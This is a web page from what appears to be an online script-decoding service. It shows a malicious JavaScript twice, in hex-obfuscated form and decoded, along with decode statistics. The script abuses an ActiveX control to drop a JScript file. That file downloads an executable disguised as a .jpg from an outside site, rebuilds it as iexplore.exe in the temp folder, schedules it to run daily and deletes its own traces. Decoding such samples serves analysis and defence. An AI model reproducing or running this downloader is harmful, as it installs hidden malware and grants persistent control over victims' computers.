Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<script language=JavaScript> var _0x9558=["\x52\x44\x56\x69\x73\x74\x61\x53\x75\x70\x70\..
Decoded Output download
<? <script language=JavaScript>
var _0x9558=["RDVistaSupport.VistaSupport.1","nDestDir","cmd /c echo function getXMLHttpRequest(){","try{return new ActiveXObject("Msxml2.XMLHTTP.6.0");}","catch(e1){","try{return new ActiveXObject("Msxml2.XMLHTTP.5.0");}","catch(e2){","try{return new ActiveXObject("Msxml2.XMLHTTP.4.0");}","catch(e3){","try{return new ActiveXObject("Msxml2.XMLHTTP.3.0");}","catch(e4){","try{return new ActiveXObject("Msxml2.XMLHTTP");}","catch(e5){","try{return new ActiveXObject("Microsoft.XMLHTTP");}","catch(e6){return null;}}}}}}}","var x=getXMLHttpRequest();","var S=new ActiveXObject("ADODB.Stream");","S.Type=1;","x.Open("Get", "http://www.sejong.org/images/main/img_issue05.jpg", 0);","x.Send();","S.Open();","S.Write(x.responseBody);","var fn1="C:\\windows\\temp\\iexplore.exe";","var fn2="C:\\windows\\temp\\conhost.tmp";","S.SaveToFile(fn2,2);","S.Close();","var d = new Date();var Hours = d.getHours();var Minutes = d.getMinutes();Minutes += 1;","var str = " /c at " + Hours + ":" + Minutes + " /EVERY:m,t,w,th,f,s,su " + fn1;","var Q=new ActiveXObject("Shell.Application");","Q.ShellExecute('c:\\windows\\system32\\cmd.exe', '/c "(echo MZ& type ' + fn2 + ') >' + fn1 + '"', '', 'open', 0);","Q.ShellExecute("c:\\windows\\system32\\cmd.exe",str,"","open",0);","Q.ShellExecute("c:\\windows\\system32\\cmd.exe", "/c del C:\\windows\\temp\\update.js", "", "open", 0);"," > C:\\windows\\temp\\update.js","rCreateProcess","c:\windows\system32\cmd.exe /c cscript.exe C:\windows\temp\update.js iexplore.exe"];function check(_0x2ee4x2){var _0x2ee4x3;try{var _0x2ee4x4= new ActiveXObject(_0x2ee4x2);if(_0x2ee4x4){_0x2ee4x3= true}else {_0x2ee4x3= false}}catch(e){_0x2ee4x3= false};return _0x2ee4x3}if(check(_0x9558[0])){var obj= new ActiveXObject(_0x9558[0]);var phkResult;var ret=1;obj[_0x9558[1]]= 0x63;str= _0x9558[2];str+= _0x9558[3];str+= _0x9558[4];str+= _0x9558[5];str+= _0x9558[6];str+= _0x9558[7];str+= _0x9558[8];str+= _0x9558[9];str+= _0x9558[10];str+= _0x9558[11];str+= _0x9558[12];str+= _0x9558[13];str+= _0x9558[14];str+= _0x9558[15]+ _0x9558[16]+ _0x9558[17]+ _0x9558[18]+ _0x9558[19]+ _0x9558[20]+ _0x9558[21]+ _0x9558[22]+ _0x9558[23]+ _0x9558[24]+ _0x9558[25]+ _0x9558[26]+ _0x9558[27]+ _0x9558[28]+ _0x9558[29]+ _0x9558[30]+ _0x9558[31];str+= _0x9558[32];obj[_0x9558[33]](str,0);obj[_0x9558[1]]= 0x63;obj[_0x9558[33]](_0x9558[34],0)}
</script> ?>Did this file decode correctly?
Original Code
<script language=JavaScript>
var _0x9558=["\x52\x44\x56\x69\x73\x74\x61\x53\x75\x70\x70\x6F\x72\x74\x2E\x56\x69\x73\x74\x61\x53\x75\x70\x70\x6F\x72\x74\x2E\x31","\x6E\x44\x65\x73\x74\x44\x69\x72","\x63\x6D\x64\x20\x2F\x63\x20\x65\x63\x68\x6F\x20\x66\x75\x6E\x63\x74\x69\x6F\x6E\x20\x67\x65\x74\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x28\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50\x2E\x36\x2E\x30\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x31\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50\x2E\x35\x2E\x30\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x32\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50\x2E\x34\x2E\x30\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x33\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50\x2E\x33\x2E\x30\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x34\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x48\x54\x54\x50\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x35\x29\x7B","\x74\x72\x79\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x4D\x69\x63\x72\x6F\x73\x6F\x66\x74\x2E\x58\x4D\x4C\x48\x54\x54\x50\x22\x29\x3B\x7D","\x63\x61\x74\x63\x68\x28\x65\x36\x29\x7B\x72\x65\x74\x75\x72\x6E\x20\x6E\x75\x6C\x6C\x3B\x7D\x7D\x7D\x7D\x7D\x7D\x7D","\x76\x61\x72\x20\x78\x3D\x67\x65\x74\x58\x4D\x4C\x48\x74\x74\x70\x52\x65\x71\x75\x65\x73\x74\x28\x29\x3B","\x76\x61\x72\x20\x53\x3D\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D\x22\x29\x3B","\x53\x2E\x54\x79\x70\x65\x3D\x31\x3B","\x78\x2E\x4F\x70\x65\x6E\x28\x22\x47\x65\x74\x22\x2C\x20\x22\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E\x73\x65\x6A\x6F\x6E\x67\x2E\x6F\x72\x67\x2F\x69\x6D\x61\x67\x65\x73\x2F\x6D\x61\x69\x6E\x2F\x69\x6D\x67\x5F\x69\x73\x73\x75\x65\x30\x35\x2E\x6A\x70\x67\x22\x2C\x20\x30\x29\x3B","\x78\x2E\x53\x65\x6E\x64\x28\x29\x3B","\x53\x2E\x4F\x70\x65\x6E\x28\x29\x3B","\x53\x2E\x57\x72\x69\x74\x65\x28\x78\x2E\x72\x65\x73\x70\x6F\x6E\x73\x65\x42\x6F\x64\x79\x29\x3B","\x76\x61\x72\x20\x66\x6E\x31\x3D\x22\x43\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x74\x65\x6D\x70\x5C\x5C\x69\x65\x78\x70\x6C\x6F\x72\x65\x2E\x65\x78\x65\x22\x3B","\x76\x61\x72\x20\x66\x6E\x32\x3D\x22\x43\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x74\x65\x6D\x70\x5C\x5C\x63\x6F\x6E\x68\x6F\x73\x74\x2E\x74\x6D\x70\x22\x3B","\x53\x2E\x53\x61\x76\x65\x54\x6F\x46\x69\x6C\x65\x28\x66\x6E\x32\x2C\x32\x29\x3B","\x53\x2E\x43\x6C\x6F\x73\x65\x28\x29\x3B","\x76\x61\x72\x20\x64\x20\x3D\x20\x6E\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3B\x76\x61\x72\x20\x48\x6F\x75\x72\x73\x20\x3D\x20\x64\x2E\x67\x65\x74\x48\x6F\x75\x72\x73\x28\x29\x3B\x76\x61\x72\x20\x4D\x69\x6E\x75\x74\x65\x73\x20\x3D\x20\x64\x2E\x67\x65\x74\x4D\x69\x6E\x75\x74\x65\x73\x28\x29\x3B\x4D\x69\x6E\x75\x74\x65\x73\x20\x2B\x3D\x20\x31\x3B","\x76\x61\x72\x20\x73\x74\x72\x20\x3D\x20\x22\x20\x2F\x63\x20\x61\x74\x20\x22\x20\x2B\x20\x48\x6F\x75\x72\x73\x20\x2B\x20\x22\x3A\x22\x20\x2B\x20\x4D\x69\x6E\x75\x74\x65\x73\x20\x2B\x20\x22\x20\x2F\x45\x56\x45\x52\x59\x3A\x6D\x2C\x74\x2C\x77\x2C\x74\x68\x2C\x66\x2C\x73\x2C\x73\x75\x20\x22\x20\x2B\x20\x66\x6E\x31\x3B","\x76\x61\x72\x20\x51\x3D\x6E\x65\x77\x20\x41\x63\x74\x69\x76\x65\x58\x4F\x62\x6A\x65\x63\x74\x28\x22\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E\x22\x29\x3B","\x51\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x28\x27\x63\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x5C\x63\x6D\x64\x2E\x65\x78\x65\x27\x2C\x20\x27\x2F\x63\x20\x22\x28\x65\x63\x68\x6F\x20\x4D\x5A\x26\x20\x74\x79\x70\x65\x20\x27\x20\x2B\x20\x66\x6E\x32\x20\x2B\x20\x27\x29\x20\x3E\x27\x20\x2B\x20\x66\x6E\x31\x20\x2B\x20\x27\x22\x27\x2C\x20\x27\x27\x2C\x20\x27\x6F\x70\x65\x6E\x27\x2C\x20\x30\x29\x3B","\x51\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x28\x22\x63\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x5C\x63\x6D\x64\x2E\x65\x78\x65\x22\x2C\x73\x74\x72\x2C\x22\x22\x2C\x22\x6F\x70\x65\x6E\x22\x2C\x30\x29\x3B","\x51\x2E\x53\x68\x65\x6C\x6C\x45\x78\x65\x63\x75\x74\x65\x28\x22\x63\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x5C\x63\x6D\x64\x2E\x65\x78\x65\x22\x2C\x20\x22\x2F\x63\x20\x64\x65\x6C\x20\x43\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x74\x65\x6D\x70\x5C\x5C\x75\x70\x64\x61\x74\x65\x2E\x6A\x73\x22\x2C\x20\x22\x22\x2C\x20\x22\x6F\x70\x65\x6E\x22\x2C\x20\x30\x29\x3B","\x20\x3E\x20\x43\x3A\x5C\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x5C\x74\x65\x6D\x70\x5C\x5C\x75\x70\x64\x61\x74\x65\x2E\x6A\x73","\x72\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73","\x63\x3A\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x73\x79\x73\x74\x65\x6D\x33\x32\x5C\x63\x6D\x64\x2E\x65\x78\x65\x20\x2F\x63\x20\x63\x73\x63\x72\x69\x70\x74\x2E\x65\x78\x65\x20\x43\x3A\x5C\x77\x69\x6E\x64\x6F\x77\x73\x5C\x74\x65\x6D\x70\x5C\x75\x70\x64\x61\x74\x65\x2E\x6A\x73\x20\x69\x65\x78\x70\x6C\x6F\x72\x65\x2E\x65\x78\x65"];function check(_0x2ee4x2){var _0x2ee4x3;try{var _0x2ee4x4= new ActiveXObject(_0x2ee4x2);if(_0x2ee4x4){_0x2ee4x3= true}else {_0x2ee4x3= false}}catch(e){_0x2ee4x3= false};return _0x2ee4x3}if(check(_0x9558[0])){var obj= new ActiveXObject(_0x9558[0]);var phkResult;var ret=1;obj[_0x9558[1]]= 0x63;str= _0x9558[2];str+= _0x9558[3];str+= _0x9558[4];str+= _0x9558[5];str+= _0x9558[6];str+= _0x9558[7];str+= _0x9558[8];str+= _0x9558[9];str+= _0x9558[10];str+= _0x9558[11];str+= _0x9558[12];str+= _0x9558[13];str+= _0x9558[14];str+= _0x9558[15]+ _0x9558[16]+ _0x9558[17]+ _0x9558[18]+ _0x9558[19]+ _0x9558[20]+ _0x9558[21]+ _0x9558[22]+ _0x9558[23]+ _0x9558[24]+ _0x9558[25]+ _0x9558[26]+ _0x9558[27]+ _0x9558[28]+ _0x9558[29]+ _0x9558[30]+ _0x9558[31];str+= _0x9558[32];obj[_0x9558[33]](str,0);obj[_0x9558[1]]= 0x63;obj[_0x9558[33]](_0x9558[34],0)}
</script>Function Calls
| None |
Stats
| MD5 | e1b6cd2d7a382686a0699239cbc2c940 |
| Eval Count | 0 |
| Decode Time | 83 ms |